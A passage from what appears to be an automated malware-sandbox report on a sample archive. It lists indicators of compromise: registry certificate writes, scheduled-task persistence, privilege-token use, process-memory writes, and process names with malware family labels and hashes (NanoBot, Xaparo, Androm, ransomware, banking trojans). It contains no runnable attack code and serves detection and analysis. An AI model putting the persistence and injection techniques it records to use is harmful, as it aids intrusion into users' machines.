c0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f ProtonVPN.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD ProtonVPNTap.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 5c000000010000000400000000080000190000000100000010000000d0fd3c9c380d7b65e26b9a3fedd39b8f030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba9531400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b0b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab040000000100000010000000c5dfb849ca051355ee2dba1ac33eb0282000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f ProtonVPNTap.exe -
NTFS ADS 1 IoCs
Processes:
firefox.exedescription ioc process File created C:\Users\Admin\Downloads\Bazaar.2020.04.7z:Zone.Identifier firefox.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 14 IoCs
Processes:
PING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEpid process 8176 PING.EXE 6724 4004 PING.EXE 2100 PING.EXE 6140 PING.EXE 2148 PING.EXE 4912 PING.EXE 5688 PING.EXE 7076 PING.EXE 11888 PING.EXE 5292 1156 PING.EXE 10320 10992 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 6 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 6712 schtasks.exe 3280 schtasks.exe 1752 schtasks.exe 2216 schtasks.exe 4696 schtasks.exe 1964 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
chrome.exeHEUR-Trojan.MSIL.NanoBot.gen-39067a6a8ac06d60189b34afbb9acd73e8e33aba91653c39a037c2f78f972f29.tmpdllhost.exeMsiExec.exemsiexec.exeHEUR-Trojan.MSIL.Crypt.gen-95d835e5420469346f203795885997bacea62706a1d68fdedac0be0f25330a05.exeMsiExec.exeMsiExec.exeBackdoor.Win32.Xaparo.fg-1e04c1e4eefe23f454553364e757209462f2561d8455628b296b1dbe83fc6ec2.exeSearchIndexer.exeTrojan-PSW.MSIL.Reline.ac-a78df3ea7c9bcf96c6c9db033be7a66d9c418c1acfa3c8efc3c4ba313c5b4fad.exeUDS-DangerousObject.Multi.Generic-188560c03f91098c43058a6afed5421527621e6586bfe3ffd7d1c9c89d8f5c6a.exeUDS-DangerousObject.Multi.Generic-188560c03f91098c43058a6afed5421527621e6586bfe3ffd7d1c9c89d8f5c6a.execsrss.exemscongg.exeTrojan.Win32.NanoBot.rmj-96e78a7404f0a5713d809b9b4609cf12872c9efeb22c4ea95219737d93665bf9.exepid process 4488 chrome.exe 4488 chrome.exe 1944 HEUR-Trojan.MSIL.NanoBot.gen-39067a6a8ac06d60189b34afbb9acd73e8e33aba91653c39a037c2f78f972f29.tmp 1944 HEUR-Trojan.MSIL.NanoBot.gen-39067a6a8ac06d60189b34afbb9acd73e8e33aba91653c39a037c2f78f972f29.tmp 3376 dllhost.exe 1960 MsiExec.exe 1960 MsiExec.exe 1960 MsiExec.exe 1960 MsiExec.exe 3828 msiexec.exe 3828 msiexec.exe 2692 HEUR-Trojan.MSIL.Crypt.gen-95d835e5420469346f203795885997bacea62706a1d68fdedac0be0f25330a05.exe 2692 HEUR-Trojan.MSIL.Crypt.gen-95d835e5420469346f203795885997bacea62706a1d68fdedac0be0f25330a05.exe 3128 MsiExec.exe 3128 MsiExec.exe 3128 MsiExec.exe 3128 MsiExec.exe 3828 msiexec.exe 3828 msiexec.exe 3944 MsiExec.exe 3944 MsiExec.exe 3944 MsiExec.exe 3944 MsiExec.exe 5008 Backdoor.Win32.Xaparo.fg-1e04c1e4eefe23f454553364e757209462f2561d8455628b296b1dbe83fc6ec2.exe 5008 Backdoor.Win32.Xaparo.fg-1e04c1e4eefe23f454553364e757209462f2561d8455628b296b1dbe83fc6ec2.exe 1312 SearchIndexer.exe 1312 SearchIndexer.exe 4416 Trojan-PSW.MSIL.Reline.ac-a78df3ea7c9bcf96c6c9db033be7a66d9c418c1acfa3c8efc3c4ba313c5b4fad.exe 4444 UDS-DangerousObject.Multi.Generic-188560c03f91098c43058a6afed5421527621e6586bfe3ffd7d1c9c89d8f5c6a.exe 4444 UDS-DangerousObject.Multi.Generic-188560c03f91098c43058a6afed5421527621e6586bfe3ffd7d1c9c89d8f5c6a.exe 1512 UDS-DangerousObject.Multi.Generic-188560c03f91098c43058a6afed5421527621e6586bfe3ffd7d1c9c89d8f5c6a.exe 1512 UDS-DangerousObject.Multi.Generic-188560c03f91098c43058a6afed5421527621e6586bfe3ffd7d1c9c89d8f5c6a.exe 3964 csrss.exe 3964 csrss.exe 3964 csrss.exe 3964 csrss.exe 1940 mscongg.exe 1940 mscongg.exe 1940 mscongg.exe 1940 mscongg.exe 1940 mscongg.exe 1940 mscongg.exe 1940 mscongg.exe 1940 mscongg.exe 1940 mscongg.exe 1940 mscongg.exe 1940 mscongg.exe 1940 mscongg.exe 1940 mscongg.exe 1740 Trojan.Win32.NanoBot.rmj-96e78a7404f0a5713d809b9b4609cf12872c9efeb22c4ea95219737d93665bf9.exe 1940 mscongg.exe 1740 Trojan.Win32.NanoBot.rmj-96e78a7404f0a5713d809b9b4609cf12872c9efeb22c4ea95219737d93665bf9.exe 1740 Trojan.Win32.NanoBot.rmj-96e78a7404f0a5713d809b9b4609cf12872c9efeb22c4ea95219737d93665bf9.exe 1740 Trojan.Win32.NanoBot.rmj-96e78a7404f0a5713d809b9b4609cf12872c9efeb22c4ea95219737d93665bf9.exe 1940 mscongg.exe 1940 mscongg.exe 1740 Trojan.Win32.NanoBot.rmj-96e78a7404f0a5713d809b9b4609cf12872c9efeb22c4ea95219737d93665bf9.exe 1740 Trojan.Win32.NanoBot.rmj-96e78a7404f0a5713d809b9b4609cf12872c9efeb22c4ea95219737d93665bf9.exe 1940 mscongg.exe 1940 mscongg.exe 1940 mscongg.exe 1740 Trojan.Win32.NanoBot.rmj-96e78a7404f0a5713d809b9b4609cf12872c9efeb22c4ea95219737d93665bf9.exe 1940 mscongg.exe 1740 Trojan.Win32.NanoBot.rmj-96e78a7404f0a5713d809b9b4609cf12872c9efeb22c4ea95219737d93665bf9.exe -
Suspicious behavior: GetForegroundWindowSpam 9 IoCs
Processes:
7zFM.exeRegAsm.exeSearchIndexer.exemscongg.execmd.execalc.exetaskmgr.exeHEUR-Trojan-Banker.Win32.BestaFera.gen-459f47867adaa021b11ba6ac50c1a4784902cf750b917c957abe9e91bd1fb8a0.exemscongg.exepid process 4380 7zFM.exe 4376 RegAsm.exe 1312 SearchIndexer.exe 4952 mscongg.exe 424 cmd.exe 6456 calc.exe 5984 taskmgr.exe 7888 HEUR-Trojan-Banker.Win32.BestaFera.gen-459f47867adaa021b11ba6ac50c1a4784902cf750b917c957abe9e91bd1fb8a0.exe 5572 mscongg.exe -
Suspicious behavior: MapViewOfSection 48 IoCs
Processes:
Backdoor.Win32.Androm.tqyq-667b8048374605d2d7bb6db4d876cdfb4324c76786ee1cc8ea93c1a55de57dcd.exemscongg.exeTrojan.Win32.NanoBot.rmj-96e78a7404f0a5713d809b9b4609cf12872c9efeb22c4ea95219737d93665bf9.exeTrojan.Win32.NanoBot.rmj-96e78a7404f0a5713d809b9b4609cf12872c9efeb22c4ea95219737d93665bf9.exemscongg.exepid process 4608 Backdoor.Win32.Androm.tqyq-667b8048374605d2d7bb6db4d876cdfb4324c76786ee1cc8ea93c1a55de57dcd.exe 1940 mscongg.exe 1740 Trojan.Win32.NanoBot.rmj-96e78a7404f0a5713d809b9b4609cf12872c9efeb22c4ea95219737d93665bf9.exe 6740 Trojan.Win32.NanoBot.rmj-96e78a7404f0a5713d809b9b4609cf12872c9efeb22c4ea95219737d93665bf9.exe 3396 mscongg.exe 3396 mscongg.exe 3396 mscongg.exe 6740 Trojan.Win32.NanoBot.rmj-96e78a7404f0a5713d809b9b4609cf12872c9efeb22c4ea95219737d93665bf9.exe 6740 Trojan.Win32.NanoBot.rmj-96e78a7404f0a5713d809b9b4609cf12872c9efeb22c4ea95219737d93665bf9.exe 6740 Trojan.Win32.NanoBot.rmj-96e78a7404f0a5713d809b9b4609cf12872c9efeb22c4ea95219737d93665bf9.exe 6740 Trojan.Win32.NanoBot.rmj-96e78a7404f0a5713d809b9b4609cf12872c9efeb22c4ea95219737d93665bf9.exe 6740 Trojan.Win32.NanoBot.rmj-96e78a7404f0a5713d809b9b4609cf12872c9efeb22c4ea95219737d93665bf9.exe 6740 Trojan.Win32.NanoBot.rmj-96e78a7404f0a5713d809b9b4609cf12872c9efeb22c4ea95219737d93665bf9.exe 6740 Trojan.Win32.NanoBot.rmj-96e78a7404f0a5713d809b9b4609cf12872c9efeb22c4ea95219737d93665bf9.exe 6740 Trojan.Win32.NanoBot.rmj-96e78a7404f0a5713d809b9b4609cf12872c9efeb22c4ea95219737d93665bf9.exe 6740 Trojan.Win32.NanoBot.rmj-96e78a7404f0a5713d809b9b4609cf12872c9efeb22c4ea95219737d93665bf9.exe 6740 Trojan.Win32.NanoBot.rmj-96e78a7404f0a5713d809b9b4609cf12872c9efeb22c4ea95219737d93665bf9.exe 6740 Trojan.Win32.NanoBot.rmj-96e78a7404f0a5713d809b9b4609cf12872c9efeb22c4ea95219737d93665bf9.exe 6740 Trojan.Win32.NanoBot.rmj-96e78a7404f0a5713d809b9b4609cf12872c9efeb22c4ea95219737d93665bf9.exe 6740 Trojan.Win32.NanoBot.rmj-96e78a7404f0a5713d809b9b4609cf12872c9efeb22c4ea95219737d93665bf9.exe 6740 Trojan.Win32.NanoBot.rmj-96e78a7404f0a5713d809b9b4609cf12872c9efeb22c4ea95219737d93665bf9.exe 6740 Trojan.Win32.NanoBot.rmj-96e78a7404f0a5713d809b9b4609cf12872c9efeb22c4ea95219737d93665bf9.exe 6740 Trojan.Win32.NanoBot.rmj-96e78a7404f0a5713d809b9b4609cf12872c9efeb22c4ea95219737d93665bf9.exe 6740 Trojan.Win32.NanoBot.rmj-96e78a7404f0a5713d809b9b4609cf12872c9efeb22c4ea95219737d93665bf9.exe 6740 Trojan.Win32.NanoBot.rmj-96e78a7404f0a5713d809b9b4609cf12872c9efeb22c4ea95219737d93665bf9.exe 6740 Trojan.Win32.NanoBot.rmj-96e78a7404f0a5713d809b9b4609cf12872c9efeb22c4ea95219737d93665bf9.exe 6740 Trojan.Win32.NanoBot.rmj-96e78a7404f0a5713d809b9b4609cf12872c9efeb22c4ea95219737d93665bf9.exe 6740 Trojan.Win32.NanoBot.rmj-96e78a7404f0a5713d809b9b4609cf12872c9efeb22c4ea95219737d93665bf9.exe 6740 Trojan.Win32.NanoBot.rmj-96e78a7404f0a5713d809b9b4609cf12872c9efeb22c4ea95219737d93665bf9.exe 6740 Trojan.Win32.NanoBot.rmj-96e78a7404f0a5713d809b9b4609cf12872c9efeb22c4ea95219737d93665bf9.exe 6740 Trojan.Win32.NanoBot.rmj-96e78a7404f0a5713d809b9b4609cf12872c9efeb22c4ea95219737d93665bf9.exe 6740 Trojan.Win32.NanoBot.rmj-96e78a7404f0a5713d809b9b4609cf12872c9efeb22c4ea95219737d93665bf9.exe 6740 Trojan.Win32.NanoBot.rmj-96e78a7404f0a5713d809b9b4609cf12872c9efeb22c4ea95219737d93665bf9.exe 6740 Trojan.Win32.NanoBot.rmj-96e78a7404f0a5713d809b9b4609cf12872c9efeb22c4ea95219737d93665bf9.exe 6740 Trojan.Win32.NanoBot.rmj-96e78a7404f0a5713d809b9b4609cf12872c9efeb22c4ea95219737d93665bf9.exe 6740 Trojan.Win32.NanoBot.rmj-96e78a7404f0a5713d809b9b4609cf12872c9efeb22c4ea95219737d93665bf9.exe 6740 Trojan.Win32.NanoBot.rmj-96e78a7404f0a5713d809b9b4609cf12872c9efeb22c4ea95219737d93665bf9.exe 6740 Trojan.Win32.NanoBot.rmj-96e78a7404f0a5713d809b9b4609cf12872c9efeb22c4ea95219737d93665bf9.exe 6740 Trojan.Win32.NanoBot.rmj-96e78a7404f0a5713d809b9b4609cf12872c9efeb22c4ea95219737d93665bf9.exe 6740 Trojan.Win32.NanoBot.rmj-96e78a7404f0a5713d809b9b4609cf12872c9efeb22c4ea95219737d93665bf9.exe 6740 Trojan.Win32.NanoBot.rmj-96e78a7404f0a5713d809b9b4609cf12872c9efeb22c4ea95219737d93665bf9.exe 6740 Trojan.Win32.NanoBot.rmj-96e78a7404f0a5713d809b9b4609cf12872c9efeb22c4ea95219737d93665bf9.exe 6740 Trojan.Win32.NanoBot.rmj-96e78a7404f0a5713d809b9b4609cf12872c9efeb22c4ea95219737d93665bf9.exe 6740 Trojan.Win32.NanoBot.rmj-96e78a7404f0a5713d809b9b4609cf12872c9efeb22c4ea95219737d93665bf9.exe 6740 Trojan.Win32.NanoBot.rmj-96e78a7404f0a5713d809b9b4609cf12872c9efeb22c4ea95219737d93665bf9.exe 6740 Trojan.Win32.NanoBot.rmj-96e78a7404f0a5713d809b9b4609cf12872c9efeb22c4ea95219737d93665bf9.exe 6740 Trojan.Win32.NanoBot.rmj-96e78a7404f0a5713d809b9b4609cf12872c9efeb22c4ea95219737d93665bf9.exe 6740 Trojan.Win32.NanoBot.rmj-96e78a7404f0a5713d809b9b4609cf12872c9efeb22c4ea95219737d93665bf9.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 19 IoCs
Processes:
chrome.exemsedge.exechrome.exepid process 4488 chrome.exe 4488 chrome.exe 4488 chrome.exe 7524 msedge.exe 7524 msedge.exe 7524 msedge.exe 7524 msedge.exe 7524 msedge.exe 7524 msedge.exe 5408 chrome.exe 5408 chrome.exe 5408 chrome.exe 5408 chrome.exe 5408 chrome.exe 5408 chrome.exe 5408 chrome.exe 5408 chrome.exe 5408 chrome.exe 5408 chrome.exe -
Suspicious behavior: SetClipboardViewer 2 IoCs
Processes:
cmd.execalc.exepid process 424 cmd.exe 6456 calc.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
firefox.exechrome.exe7zFM.exedllhost.exemsiexec.exeProtonVPN.exedescription pid process Token: SeDebugPrivilege 2388 firefox.exe Token: SeDebugPrivilege 2388 firefox.exe Token: SeDebugPrivilege 2388 firefox.exe Token: SeShutdownPrivilege 4488 chrome.exe Token: SeCreatePagefilePrivilege 4488 chrome.exe Token: SeShutdownPrivilege 4488 chrome.exe Token: SeCreatePagefilePrivilege 4488 chrome.exe Token: SeShutdownPrivilege 4488 chrome.exe Token: SeCreatePagefilePrivilege 4488 chrome.exe Token: SeShutdownPrivilege 4488 chrome.exe Token: SeCreatePagefilePrivilege 4488 chrome.exe Token: SeShutdownPrivilege 4488 chrome.exe Token: SeCreatePagefilePrivilege 4488 chrome.exe Token: SeShutdownPrivilege 4488 chrome.exe Token: SeCreatePagefilePrivilege 4488 chrome.exe Token: SeShutdownPrivilege 4488 chrome.exe Token: SeCreatePagefilePrivilege 4488 chrome.exe Token: SeShutdownPrivilege 4488 chrome.exe Token: SeCreatePagefilePrivilege 4488 chrome.exe Token: SeShutdownPrivilege 4488 chrome.exe Token: SeCreatePagefilePrivilege 4488 chrome.exe Token: SeRestorePrivilege 4380 7zFM.exe Token: 35 4380 7zFM.exe Token: SeShutdownPrivilege 4488 chrome.exe Token: SeCreatePagefilePrivilege 4488 chrome.exe Token: SeSecurityPrivilege 4380 7zFM.exe Token: SeSecurityPrivilege 4380 7zFM.exe Token: SeSecurityPrivilege 4380 7zFM.exe Token: SeDebugPrivilege 3376 dllhost.exe Token: 33 3376 dllhost.exe Token: SeIncBasePriorityPrivilege 3376 dllhost.exe Token: SeSecurityPrivilege 3828 msiexec.exe Token: SeCreateTokenPrivilege 2800 ProtonVPN.exe Token: SeAssignPrimaryTokenPrivilege 2800 ProtonVPN.exe Token: SeLockMemoryPrivilege 2800 ProtonVPN.exe Token: SeIncreaseQuotaPrivilege 2800 ProtonVPN.exe Token: SeMachineAccountPrivilege 2800 ProtonVPN.exe Token: SeTcbPrivilege 2800 ProtonVPN.exe Token: SeSecurityPrivilege 2800 ProtonVPN.exe Token: SeTakeOwnershipPrivilege 2800 ProtonVPN.exe Token: SeLoadDriverPrivilege 2800 ProtonVPN.exe Token: SeSystemProfilePrivilege 2800 ProtonVPN.exe Token: SeSystemtimePrivilege 2800 ProtonVPN.exe Token: SeProfSingleProcessPrivilege 2800 ProtonVPN.exe Token: SeIncBasePriorityPrivilege 2800 ProtonVPN.exe Token: SeCreatePagefilePrivilege 2800 ProtonVPN.exe Token: SeCreatePermanentPrivilege 2800 ProtonVPN.exe Token: SeBackupPrivilege 2800 ProtonVPN.exe Token: SeRestorePrivilege 2800 ProtonVPN.exe Token: SeShutdownPrivilege 2800 ProtonVPN.exe Token: SeDebugPrivilege 2800 ProtonVPN.exe Token: SeAuditPrivilege 2800 ProtonVPN.exe Token: SeSystemEnvironmentPrivilege 2800 ProtonVPN.exe Token: SeChangeNotifyPrivilege 2800 ProtonVPN.exe Token: SeRemoteShutdownPrivilege 2800 ProtonVPN.exe Token: SeUndockPrivilege 2800 ProtonVPN.exe Token: SeSyncAgentPrivilege 2800 ProtonVPN.exe Token: SeEnableDelegationPrivilege 2800 ProtonVPN.exe Token: SeManageVolumePrivilege 2800 ProtonVPN.exe Token: SeImpersonatePrivilege 2800 ProtonVPN.exe Token: SeCreateGlobalPrivilege 2800 ProtonVPN.exe Token: SeCreateTokenPrivilege 2800 ProtonVPN.exe Token: SeAssignPrimaryTokenPrivilege 2800 ProtonVPN.exe Token: SeLockMemoryPrivilege 2800 ProtonVPN.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
firefox.exechrome.exe7zFM.exeHEUR-Trojan.MSIL.NanoBot.gen-39067a6a8ac06d60189b34afbb9acd73e8e33aba91653c39a037c2f78f972f29.tmpProtonVPN.exemsiexec.exepid process 2388 firefox.exe 2388 firefox.exe 2388 firefox.exe 2388 firefox.exe 2388 firefox.exe 2388 firefox.exe 2388 firefox.exe 2388 firefox.exe 2388 firefox.exe 2388 firefox.exe 2388 firefox.exe 2388 firefox.exe 2388 firefox.exe 2388 firefox.exe 2388 firefox.exe 2388 firefox.exe 2388 firefox.exe 2388 firefox.exe 2388 firefox.exe 2388 firefox.exe 2388 firefox.exe 4488 chrome.exe 4488 chrome.exe 4488 chrome.exe 4488 chrome.exe 4488 chrome.exe 4488 chrome.exe 4488 chrome.exe 4488 chrome.exe 4488 chrome.exe 4488 chrome.exe 4488 chrome.exe 4488 chrome.exe 4488 chrome.exe 4488 chrome.exe 4488 chrome.exe 4488 chrome.exe 4488 chrome.exe 4488 chrome.exe 4488 chrome.exe 4488 chrome.exe 4488 chrome.exe 4488 chrome.exe 4488 chrome.exe 4488 chrome.exe 4488 chrome.exe 4488 chrome.exe 4380 7zFM.exe 4488 chrome.exe 4380 7zFM.exe 4380 7zFM.exe 4380 7zFM.exe 1944 HEUR-Trojan.MSIL.NanoBot.gen-39067a6a8ac06d60189b34afbb9acd73e8e33aba91653c39a037c2f78f972f29.tmp 4380 7zFM.exe 2800 ProtonVPN.exe 4380 7zFM.exe 2800 ProtonVPN.exe 4536 msiexec.exe 4536 msiexec.exe 4380 7zFM.exe 4380 7zFM.exe 4380 7zFM.exe 4380 7zFM.exe 4380 7zFM.exe -
Suspicious use of SendNotifyMessage 64 IoCs
Processes:
chrome.exeBackdoor.Win32.Androm.tqyq-667b8048374605d2d7bb6db4d876cdfb4324c76786ee1cc8ea93c1a55de57dcd.exeTrojan.Win32.NanoBot.rmj-96e78a7404f0a5713d809b9b4609cf12872c9efeb22c4ea95219737d93665bf9.exemscongg.exeTrojan-Spy.Win32.Hoaki.btu-89ceb49c67e4f8f715b9eef4ad2b1fcac135da2560072c5f3449273f08a7f7bb.exeTrojan-Spy.Win32.Hoaki.btu-89ceb49c67e4f8f715b9eef4ad2b1fcac135da2560072c5f3449273f08a7f7bb.exetaskmgr.exepid process 4488 chrome.exe 4488 chrome.exe 4488 chrome.exe 4488 chrome.exe 4488 chrome.exe 4488 chrome.exe 4488 chrome.exe 4488 chrome.exe 4488 chrome.exe 4488 chrome.exe 4488 chrome.exe 4488 chrome.exe 4608 Backdoor.Win32.Androm.tqyq-667b8048374605d2d7bb6db4d876cdfb4324c76786ee1cc8ea93c1a55de57dcd.exe 4608 Backdoor.Win32.Androm.tqyq-667b8048374605d2d7bb6db4d876cdfb4324c76786ee1cc8ea93c1a55de57dcd.exe 4608 Backdoor.Win32.Androm.tqyq-667b8048374605d2d7bb6db4d876cdfb4324c76786ee1cc8ea93c1a55de57dcd.exe 1740 Trojan.Win32.NanoBot.rmj-96e78a7404f0a5713d809b9b4609cf12872c9efeb22c4ea95219737d93665bf9.exe 1740 Trojan.Win32.NanoBot.rmj-96e78a7404f0a5713d809b9b4609cf12872c9efeb22c4ea95219737d93665bf9.exe 1740 Trojan.Win32.NanoBot.rmj-96e78a7404f0a5713d809b9b4609cf12872c9efeb22c4ea95219737d93665bf9.exe 1940 mscongg.exe 1940 mscongg.exe 1940 mscongg.exe 5792 Trojan-Spy.Win32.Hoaki.btu-89ceb49c67e4f8f715b9eef4ad2b1fcac135da2560072c5f3449273f08a7f7bb.exe 5792 Trojan-Spy.Win32.Hoaki.btu-89ceb49c67e4f8f715b9eef4ad2b1fcac135da2560072c5f3449273f08a7f7bb.exe 5792 Trojan-Spy.Win32.Hoaki.btu-89ceb49c67e4f8f715b9eef4ad2b1fcac135da2560072c5f3449273f08a7f7bb.exe 5792 Trojan-Spy.Win32.Hoaki.btu-89ceb49c67e4f8f715b9eef4ad2b1fcac135da2560072c5f3449273f08a7f7bb.exe 716 Trojan-Spy.Win32.Hoaki.btu-89ceb49c67e4f8f715b9eef4ad2b1fcac135da2560072c5f3449273f08a7f7bb.exe 716 Trojan-Spy.Win32.Hoaki.btu-89ceb49c67e4f8f715b9eef4ad2b1fcac135da2560072c5f3449273f08a7f7bb.exe 716 Trojan-Spy.Win32.Hoaki.btu-89ceb49c67e4f8f715b9eef4ad2b1fcac135da2560072c5f3449273f08a7f7bb.exe 5984 taskmgr.exe 5984 taskmgr.exe 5984 taskmgr.exe 5984 taskmgr.exe 5984 taskmgr.exe 5984 taskmgr.exe 5984 taskmgr.exe 5984 taskmgr.exe 5984 taskmgr.exe 5984 taskmgr.exe 5984 taskmgr.exe 5984 taskmgr.exe 5984 taskmgr.exe 5984 taskmgr.exe 5984 taskmgr.exe 5984 taskmgr.exe 5984 taskmgr.exe 5984 taskmgr.exe 5984 taskmgr.exe 5984 taskmgr.exe 5984 taskmgr.exe 5984 taskmgr.exe 5984 taskmgr.exe 5984 taskmgr.exe 5984 taskmgr.exe 5984 taskmgr.exe 5984 taskmgr.exe 5984 taskmgr.exe 5984 taskmgr.exe 5984 taskmgr.exe 5984 taskmgr.exe 5984 taskmgr.exe 5984 taskmgr.exe 5984 taskmgr.exe 5984 taskmgr.exe 5984 taskmgr.exe -
Suspicious use of SetWindowsHookEx 10 IoCs
Processes:
firefox.exeHEUR-Backdoor.Win32.Xaparo.gen-32b193b31a207856caddeac610618ff05855cf72fb737dd80f78726884f4a8ec.exeBackdoor.Win32.Xaparo.jl-4723ab5ed01fb642eb602ff59309d4d698e6011145ca1b757bb223b5a67fe159.exeTrojan-Ransom.Python.Pyrgen.a-7ed29b5971fdfce885116395debc7289bf0e27966e6c72e41f0e6902b30c6575.exeTrojan-Ransom.Python.Pyrgen.a-7ed29b5971fdfce885116395debc7289bf0e27966e6c72e41f0e6902b30c6575.exepid process 2388 firefox.exe 2388 firefox.exe 2388 firefox.exe 2388 firefox.exe 132 HEUR-Backdoor.Win32.Xaparo.gen-32b193b31a207856caddeac610618ff05855cf72fb737dd80f78726884f4a8ec.exe 7020 Backdoor.Win32.Xaparo.jl-4723ab5ed01fb642eb602ff59309d4d698e6011145ca1b757bb223b5a67fe159.exe 8012 Trojan-Ransom.Python.Pyrgen.a-7ed29b5971fdfce885116395debc7289bf0e27966e6c72e41f0e6902b30c6575.exe 8012 Trojan-Ransom.Python.Pyrgen.a-7ed29b5971fdfce885116395debc7289bf0e27966e6c72e41f0e6902b30c6575.exe 5020 Trojan-Ransom.Python.Pyrgen.a-7ed29b5971fdfce885116395debc7289bf0e27966e6c72e41f0e6902b30c6575.exe 5020 Trojan-Ransom.Python.Pyrgen.a-7ed29b5971fdfce885116395debc7289bf0e27966e6c72e41f0e6902b30c6575.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
firefox.exefirefox.exedescription pid process target process PID 4268 wrote to memory of 2388 4268 firefox.exe firefox.exe PID 4268 wrote to memory of 2388 4268 firefox.exe firefox.exe PID 4268 wrote to memory of 2388 4268 firefox.exe firefox.exe PID 4268 wrote to memory of 2388 4268 firefox.exe firefox.exe PID 4268 wrote to memory of 2388 4268 firefox.exe firefox.exe PID 4268 wrote to memory of 2388 4268 firefox.exe firefox.exe PID 4268 wrote to memory of 2388 4268 firefox.exe firefox.exe PID 4268 wrote to memory of 2388 4268 firefox.exe firefox.exe PID 4268 wrote to memory of 2388 4268 firefox.exe firefox.exe PID 4268 wrote to memory of 2388 4268 firefox.exe firefox.exe PID 4268 wrote to memory of 2388 4268 firefox.exe firefox.exe PID 2388 wrote to memory of 4112 2388 firefox.exe firefox.exe PID 2388 wrote to memory of 4112 2388 firefox.exe firefox.exe PID 2388 wrote to memory of 4112 2388 firefox.exe firefox.exe PID 2388 wrote to memory of 4112 2388 firefox.exe firefox.exe PID 2388 wrote to memory of 4112 2388 firefox.exe firefox.exe PID 2388 wrote to memory of 4112 2388 firefox.exe firefox.exe PID 2388 wrote to memory of 4112 2388 firefox.exe firefox.exe PID 2388 wrote to memory of 4112 2388 firefox.exe firefox.exe PID 2388 wrote to memory of 4112 2388 firefox.exe firefox.exe PID 2388 wrote to memory of 4112 2388 firefox.exe firefox.exe PID 2388 wrote to memory of 4112 2388 firefox.exe firefox.exe PID 2388 wrote to memory of 4112 2388 firefox.exe firefox.exe PID 2388 wrote to memory of 4112 2388 firefox.exe firefox.exe PID 2388 wrote to memory of 4112 2388 firefox.exe 